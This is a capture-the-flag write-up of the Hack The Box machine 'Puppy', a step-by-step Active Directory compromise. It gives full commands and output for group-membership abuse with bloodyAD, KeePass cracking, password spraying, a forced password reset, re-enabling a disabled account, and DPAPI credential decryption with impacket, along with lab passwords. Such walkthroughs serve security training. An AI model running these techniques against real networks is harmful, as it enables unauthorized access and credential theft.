This Windows Medium box starts with our user having write permissions over the DEVELOPERS group. Once we look at shares we find available to use the DEV share. In this share lies a keepass database, which we exfiltrate to our machine. Once done we crack the password to the database and discover users and credentials. After password spraying we have another valid user, and this user is in the SENIOR DEVS group, with GenericAll to user Adam.Silver. After re-enabling his account, we can finally get on the box. Going to the root directory we find a Backups directory with a zip file containing an xml file with credentials for Steph.Cooper. Using these credentials we login, and if we looked at bloodhound or other users we noticed a steph.cooper_adm. With access to this users AppData we exfiltrate the file required for DPAPI. Once we dump DPAPI, we find credentials for steph.cooper_adm.

Starts as an assumed breach with credentials: levi.james / KingofAkron2025!

Initial Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-08-19 23:17:01Z)
111/tcp  open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
2049/tcp open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3260/tcp open  iscsi?        syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-08-19T23:18:50
|_  start_date: N/A
|_clock-skew: -55m40s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 62785/tcp): CLEAN (Timeout)
|   Check 2 (port 31083/tcp): CLEAN (Timeout)
|   Check 3 (port 26380/udp): CLEAN (Timeout)
|   Check 4 (port 63353/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

What are we doing as the KING

At first, I wanted to check and see what we have writable.

1
2
3
4
5
6
7
8
9
10
11
12
13
konoha# bloodyAD -v DEBUG -d puppy.htb -u levi.james -p 'KingofAkron2025!' --dc-ip 10.10.11.70 --host puppy.htb get writable
[+] Connection URL: ldap+ntlm-pw://puppy.htb\levi.james:KingofAkron2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
permission: WRITE

distinguishedName: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB
permission: WRITE

distinguishedName: CN=DEVELOPERS,DC=PUPPY,DC=HTB
permission: WRITE

This shows us we can add ourselves to this group since we have write.

1
2
3
4
5
konoha# bloodyAD -v DEBUG -d puppy.htb -u levi.james -p 'KingofAkron2025!' --dc-ip 10.10.11.70 --host puppy.htb add groupMember 'Developers' 'levi.james'
[+] Connection URL: ldap+ntlm-pw://puppy.htb\levi.james:KingofAkron2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful
[+] levi.james added to Developers

Getting to know one another 😑

So I went ahead and got a bloodhound dump for later use when we’re futher.

1
konoha# rusthound -z -u levi.james@puppy.htb -p 'KingofAkron2025!' -f DC.puppy.htb -d puppy.htb -i 10.10.11.70

What were you hiding??

Before we didn’t have read access over the DEV share. Now we can see what lingers in this share.

1
2
3
4
5
6
7
8
9
10
11
12
13
konoha# impacket-smbclient 'puppy.htb/levi.james:KingofAkron2025!@puppy.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use DEV
# ls
drw-rw-rw-          0  Sun Mar 23 02:07:57 2025 .
drw-rw-rw-          0  Sat Mar  8 10:52:57 2025 ..
-rw-rw-rw-   34394112  Sun Mar 23 02:09:12 2025 KeePassXC-2.7.9-Win64.msi
drw-rw-rw-          0  Sun Mar  9 15:16:16 2025 Projects
-rw-rw-rw-       2677  Tue Mar 11 21:25:46 2025 recovery.kdbx
# mget recovery.kdbx
[*] Downloading recovery.kdbx

A keepass database, we can crack this hash using keepass2john, or I just used keepass4brute.sh.

1
2
3
4
5
6
7
8
konoha# ./keepass4brute.sh ~/Documents/htb/machines/TMP/recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344393 - Attempts per minute: 86 - Estimated time remaining: 16 weeks, 3 days
[+] Current attempt: liverpool

[*] Password found: liverpool

Show me your moves!!

Once in the database we have some users and some passwords we can sort through.

We can go and password spray, once we do we get a hit.

1
2
3
4
5
6
konoha# nxc smb puppy.htb -u users.lst -p passwd.lst --continue-on-success
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
<SNIP>
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE

Lets see what he has in bloodhound.

So GenericAll, we can simply just change his password and get on the box.

1
2
3
4
5
konoha# bloodyAD -v DEBUG -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc-ip 10.10.11.70 --host puppy.htb set password adam.silver 'SuperSecurePassword123!'
[+] Connection URL: ldap+ntlm-pw://puppy.htb\ant.edwards:Antman2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful
[+] Password changed successfully!

We can try to evil-winrm with his account but when we don’t get connected, looking more at his account explains.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
konoha# bloodyAD -v DEBUG -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc-ip 10.10.11.70 --host puppy.htb get object adam.silver
[+] Connection URL: ldap+ntlm-pw://puppy.htb\ant.edwards:Antman2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful

distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
accountExpires: 9999-12-31 23:59:59.999999+00:00
<SNIP>
sAMAccountName: adam.silver
sAMAccountType: 805306368
sn: Silver
uSNChanged: 176441
uSNCreated: 12814
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD

We can see its disabled, so we can simply remove the ACCOUNTDISABLE flag and try again.

1
2
3
4
5
konoha# bloodyAD -v DEBUG -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc-ip 10.10.11.70 --host puppy.htb remove uac adam.silver -f ACCOUNTDISABLE
[+] Connection URL: ldap+ntlm-pw://puppy.htb\ant.edwards:Antman2025%21@puppy.htb/?serverip=10.10.11.70
[*] Trying to connect to puppy.htb...
[+] Connection successful
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl

Silver Surfing

Once connected, we look at the root directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\> ls -fo


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs-         2/28/2025  12:31 PM                $Recycle.Bin
d--h--         5/12/2025   5:29 PM                $WinREAgent
d-----          5/9/2025  10:48 AM                Backups
d--hsl         2/19/2025  11:32 AM                Documents and Settings
d-----         5/12/2025   5:21 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
<SNIP>

We see a backups directory, and when checking that out we find a site-backup-2024-12-30.zip. 

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Backups> ls


    Directory: C:\Backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip

Once we download this and look at it, only one file looks interesting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\Backups> ls


    Directory: C:\Backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip


*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!

Backup Files suck dude!!!

Here we download the file and check it out, revealing credentials.

1
konoha# unzip site-backup-2024-12-30.zip puppy/nms-auth-config.xml.bak

From the backup xml file we have found the key.

1
2
3
4
5
6
7
8
9
10
konoha# cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>

Lets get intersteller coop!!

We can login and take a look around, but there’s nothing we haven’t already seen. So the only thing to do is check DPAPI.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -h


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> attrib -H C8D69EBE9A43E9DEBF6B5FBD48B521B9
Not resetting system file - C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> attrib -S -H C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> download C8D69EBE9A43E9DEBF6B5FBD48B521B9

Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9

Info: Download successful!
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> cd ..
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> ls


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-          3/8/2025   7:53 AM                Credentials
d---s-          3/8/2025   7:40 AM                Crypto
d-----          3/8/2025   7:40 AM                Internet Explorer
d-----          3/8/2025   7:40 AM                Network
d---s-          3/8/2025   7:40 AM                Protect
d-----          5/8/2021   1:20 AM                Spelling
d---s-         2/23/2025   2:35 PM                SystemCertificates
d-----         2/23/2025   2:36 PM                Vault
d-----          3/8/2025   7:52 AM                Windows


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd windows
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\windows> ls


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\windows


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---          3/8/2025   7:40 AM                AccountPictures
d-----          5/8/2021   1:20 AM                CloudStore
d-r---          3/8/2025   7:40 AM                Libraries
d-----          5/8/2021   1:20 AM                Network Shortcuts
d-----          5/8/2021   1:20 AM                Printer Shortcuts
d-r---          3/8/2025   7:40 AM                Recent
d-r---          3/8/2025   7:40 AM                SendTo
d-----          3/8/2025   7:52 AM                ServerManager
d-r---          3/8/2025   7:40 AM                Start Menu
d-----          5/8/2021   1:20 AM                Templates
d-----          3/8/2025   8:01 AM                Themes


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\windows> cd ..
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> ls


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-          3/8/2025   7:53 AM                Credentials
d---s-          3/8/2025   7:40 AM                Crypto
d-----          3/8/2025   7:40 AM                Internet Explorer
d-----          3/8/2025   7:40 AM                Network
d---s-          3/8/2025   7:40 AM                Protect
d-----          5/8/2021   1:20 AM                Spelling
d---s-         2/23/2025   2:35 PM                SystemCertificates
d-----         2/23/2025   2:36 PM                Vault
d-----          3/8/2025   7:52 AM                Windows


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd Protect
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> ls


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         2/23/2025   2:36 PM                S-1-5-21-1487982659-1829050783-2281216199-1107


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> download S-1-5-21-1487982659-1829050783-2281216199-1107

Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107 to S-1-5-21-1487982659-1829050783-2281216199-1107

Info: Download successful!

Impacket this papi!

Now lets dump with impacket-dpapi and see what we have.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
konoha# impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
konoha# impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description :
Unknown     :
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

So It is how it is

Now we can try to evil-winrm on and get the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
konoha# evil-winrm -i puppy.htb -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cd \Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         8/19/2025   4:10 PM             34 root.txt